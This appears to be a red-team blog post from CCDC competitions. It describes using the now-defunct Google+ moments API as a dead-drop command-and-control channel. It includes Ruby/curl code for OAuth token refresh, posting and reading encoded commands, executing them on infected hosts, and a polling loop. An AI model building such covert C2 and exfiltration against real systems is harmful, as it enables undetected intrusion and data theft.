Over the past few years, I have been organizing, participating in, and frequently writing attack software for CCDC red teams. This year, as I started dusting off the code, spinning up VMs, and testing things to see if they still work, I noticed that my last-ditch covert channel for control and data exfiltration no longer works.
This method was one of my favorites, and to my knowledge it was never found by the blue teams. Prior to the regional competitions last year, a reward was offered at SAHA to any blue team who could find it, but it was never claimed.
Creating command and control (C2) methods for malware to function in a closely monitored network is an interesting problem with innumerable solutions; the only rule is that commands must be sent to and data must be received from the compromised systems. The most convenient way for this to work is via a listening service, like Windows' built-in WMI service or SSH on the various *nixes. But these tend to get blocked quickly and easily by host and network firewalls, since blocking inbound traffic is the default policy and open ports are easily identified.
So most red team malware follows a callback strategy, periodically connecting out to the controller. You can easily use any port with existing backdoors, and if you take the time to develop an appropriate backdoor and controller, you can use any protocol imaginable. But direct connections can be trouble: once the blue team finds a suspicious-looking connection to your IP, they can block it, then hunt for that address and quickly shut down anything else communicating with it. Using many different IP addresses can help, but conscientious blue teams analyzing network traffic may still find connections heading to an unknown destination and shut down or clean infected systems. Blue teams may also use outbound firewalls to block this traffic. Some services would have to be allowed in or out, but there was no way we would know which ones until we showed up for the competition.
More advanced solutions, rather than establishing a connection straight in or out, use a legitimate third-party service you can both send data to and read data from as a dead drop site. Dead drop style C2 is more complex, since you must encode and encapsulate your data to fit the medium; there is normally no inherent direction of data flow, just data that has been posted or not. Data blobs will almost certainly be read multiple times, out of order, and by every client that is using this C2 method. As a result, you must largely implement your own addressing, sequencing and tagging, and de-duplication for this to be more than a toy proof of concept. If you use dead drop C2 for more serious hacking, you must also implement encryption and authentication to avoid having your C2 method co-opted by a third party.
As far as I could tell, there was only one thing that you could guarantee would never be blocked; one thing no blue team could ever do without. And that was Google. Granted, you can't use www.google.com itself as a dead drop; but the way Google set up its servers, they act as a front-end gateway for most Google services. So most of the time, www.google.com would resolve to the same IP range or even the same IP as plus.google.com, accounts.google.com, www.googleapis.com, etc. And Google did offer an API for Google+. And this API did include the ability to both post text data ("moments") and read that posted data, fulfilling all the requirements of a good dead drop.
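You can check the overlap yourself; here is a minimal sketch (the hostnames are just examples, and the addresses Google returns vary by time and location):

require 'resolv'

# Compare the front-end addresses of several Google hostnames.
%w[www.google.com accounts.google.com www.googleapis.com].each do |host|
  ips = Resolv.getaddresses(host)
  puts "#{host} -> #{ips.join(', ')}"
end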
Using the Google+ API as a dead-drop-style C2 method required a number of steps:
1. Create a burner account so if someone finds your malware and extracts the authentication tokens from it, they cannot take over any account you care about.
2. Go to the Google Developers Console and create a project (this part can be done from any Google account). Then use the web UI to enable access to the Google+ API. Google provides a variety of OAuth 2.0 mechanisms for different usage patterns. Since we are interested in the simplest way forward, so we can hide and automate the process as much as possible, we go to Credentials and create an "Other" type OAuth client ID and secret (and save these).
3. Set up an OAuth 2 Google URL with your client ID that will be used to prompt the user account for access. For a normal application, this is the URL all users would visit to grant your application access. The URL query parameters indicate the type of Google API access that the application requires, which for Google+ was "https://www.googleapis.com/auth/plus.login profile". For my application, the complete URL looked like this: https://accounts.google.com/o/oauth2/auth?scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fplus.login%20profile&redirect_uri=urn:ietf:wg:oauth:2.0:oob&response_type=code&client_id=
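If you'd rather build that URL programmatically than paste it together by hand, a few lines of Ruby will do it (a sketch; the parameter values are the same ones shown above):

require 'uri'

client_id = '<REDACTED>.apps.googleusercontent.com'   # the client ID from step 2
params = {
  'scope'         => 'https://www.googleapis.com/auth/plus.login profile',
  'redirect_uri'  => 'urn:ietf:wg:oauth:2.0:oob',
  'response_type' => 'code',
  'client_id'     => client_id
}
# encode_www_form percent-encodes each value and joins the pairs with '&'
puts "https://accounts.google.com/o/oauth2/auth?#{URI.encode_www_form(params)}"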
4. Signed in under the burner account, go to the URL set up in step 3. You will be prompted to grant the application access to perform certain actions on behalf of your account. When you click to allow it, it will return an authorization code.
5. You will then send the authorization code, your client ID, and your client secret to Google in an API submission and get an access token and a refresh token. I just created this HTML form in a text editor, saved it, opened it in a browser and clicked to submit it:
<form action="https://accounts.google.com/o/oauth2/token" method="POST" enctype="application/x-www-form-urlencoded">
  code: <input type="text" name="code" size="100" value="THIS IS WHERE YOU PUT YOUR AUTH CODE"><br>
  client_id: <input type="text" name="client_id" size="100" value="<REDACTED>.apps.googleusercontent.com"><br>
  client_secret: <input type="text" name="client_secret" size="100" value="<REDACTED>"><br>
  redirect_uri: <input type="text" name="redirect_uri" size="100" value="urn:ietf:wg:oauth:2.0:oob"><br>
  grant_type: <input type="text" name="grant_type" size="100" value="authorization_code"><br>
  <input type="submit" value="Submit">
</form>
Save the refresh token you get back. The access token is only good for an hour, so it's not as important to save. Your initial setup is complete and should not need to be repeated.
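If you'd rather not bother with an HTML form, the same exchange can be done the way the later snippets work, shelling out to curl from Ruby (a sketch using the same placeholders; substitute your own authorization code, client ID, and secret):

require 'json'

curlresp = `curl https://accounts.google.com/o/oauth2/token -d 'grant_type=authorization_code&code=YOUR_AUTH_CODE&client_id=<REDACTED>.apps.googleusercontent.com&client_secret=<REDACTED>&redirect_uri=urn:ietf:wg:oauth:2.0:oob'`
parsed = JSON.parse(curlresp)
puts "refresh token: #{parsed['refresh_token']}"   # save this one
puts "access token:  #{parsed['access_token']}"    # expires in about an hour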
6. Now you need to write the code that will take the refresh token (which won't change), client ID, and client secret and submit them to get an access token. This will need to happen about once every hour you use this C2 method, so it needs to be automated. For my controller, I just used a curl command in a few lines of Ruby to do this:
require 'json'

curlresp = `curl https://accounts.google.com/o/oauth2/token -d 'grant_type=refresh_token&refresh_token=<REDACTED>&client_id=<REDACTED>.apps.googleusercontent.com&client_secret=<REDACTED>'`
parsed = JSON.parse(curlresp)
authcode = parsed['access_token']
Your malware also needs to be able to do this automatically, because on day 2, your callback still needs to work, but any access tokens you gave it on day 1 won't work anymore. Once you have your access token, you can begin to make queries to the API using that access token to authenticate.
7. Now that authentication is out of the way, remember what I said earlier about de-duplication, addressing, and tagging? Now is when you really need to have figured that out. This is the non-exciting software engineering side of hacking, but it is very important. Otherwise every infected system is going to execute every command ever sent every time it calls back, which is a bad thing. You can identify systems by system name, IP address, motherboard GUID, product ID, MAC addresses, or other system properties. Or you can create your own ID on the controller and issue it to each client as it comes in (best for uniqueness, but requires saving state). System name and IP addresses can change, which can be a good or bad thing: you'll see when they change, but it's hard to correlate back to previous callbacks.
In my case, I generated a random ID (randid) for each message with a different tag for commands ("cmd") and responses ("resp") so a client doesn't try to execute its own response, wrote code to immediately delete each message after reading to avoid duplication, used a combination of system name and IP addresses as the target identifier, and combined those with the command or response data in a base64 encoded string (postdata) to avoid illegal character and JSON encoding issues. (I slacked off and didn't use a proper JSON encoder for this part.) The deletes didn't always take effect right away though, so there was also a timeout before re-polling. A sketch of the encoding step follows.
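Concretely, the encoding can look something like this (a sketch; the '|' delimiter and field order are illustrative placeholders, not my exact format):

require 'base64'
require 'securerandom'
require 'socket'

# Per-message random ID, plus a target identifier built from system name and IP.
randid = SecureRandom.hex(8)
ip     = Socket.ip_address_list.detect(&:ipv4_private?)&.ip_address
target = "#{Socket.gethostname}|#{ip}"
cmd    = 'whoami'

# Tag ("cmd" vs "resp"), target, and payload, base64 encoded so the description
# field never contains characters that break the hand-built JSON.
desc = Base64.strict_encode64(['cmd', randid, target, cmd].join('|'))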
8. With your communications strategy nailed down, the first thing you need to be able to do is post all that data to the dead drop. For Google+, using the moments insert API was the easiest way to do that; again I used a Ruby snippet to assemble the JSON object and POST it with the access token to the Google API endpoint:
postdata = '{"kind":"plus#moment","type":"http://schema.org/AddAction","object":{"kind":"plus#itemScope","type": "http://schema.org/AddAction","id":"cmd'+randid+'","name":"Cmd '+randid+'","description":"'+desc+'"}}' curlresp = `curl -H "Authorization: Bearer #{authcode}" -H "Content-Type: application/json" -d '#{postdata}' https://www.googleapis.com/plus/v1/people/me/moments/vault`
This moments insert API is no longer functional. Google has disabled it along with all the other APIs that can create or modify data, breaking this process, but we'll continue since it's educational.
9. Once that is done, you need a method to pull down the list of posted commands or responses. The moments list API was designed for just that:
curlresp = `curl -H "Authorization: Bearer #{authcode}" https://www.googleapis.com/plus/v1/people/me/moments/vault`
parsed = JSON.parse(curlresp)
if parsed.include? 'items'
  parsed['items'].each do |item|
    target = item['target']
    if target['description'].start_with? '<REDACTED>'
      # base64 decode and parse the command or result data stored in the description field here
    end
  end
end
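Filling in that last comment, the decode side is just the mirror image of the encoding sketch from step 7 (again using the illustrative '|' delimiter; desc here is the description field with the redacted marker prefix already stripped off):

require 'base64'

# Split the decoded blob back into tag, message ID, target, and payload.
tag, msgid, target_id, payload = Base64.strict_decode64(desc).split('|', 4)
if tag == 'cmd'
  result = `#{payload}`   # a client only executes "cmd" messages, never "resp"
end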
10. Finally, once you have processed a command or response, you need to delete it:
delresp = `curl -H "Authorization: Bearer #{authcode}" -X DELETE https://www.googleapis.com/plus/v1/moments/#{item['id']}`
If you processed a command and have data to send back to the controller, you'll repeat step 8.
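Putting it all together, the client side of this C2 boils down to a polling loop. Here is a skeletal sketch; refresh_access_token, list_moments, command_for_me?, execute, post_response, and delete_moment are hypothetical wrappers around the snippets shown in the earlier steps:

loop do
  authcode = refresh_access_token        # step 6: a token is good for about an hour
  list_moments(authcode).each do |item|
    next unless command_for_me?(item)    # step 7: addressing and tagging checks
    result = execute(item)               # run the command locally
    post_response(authcode, result)      # step 8 again, tagged "resp"
    delete_moment(authcode, item)        # step 10: avoid re-execution
  end
  sleep 60                               # deletes can lag, so pause before re-polling
end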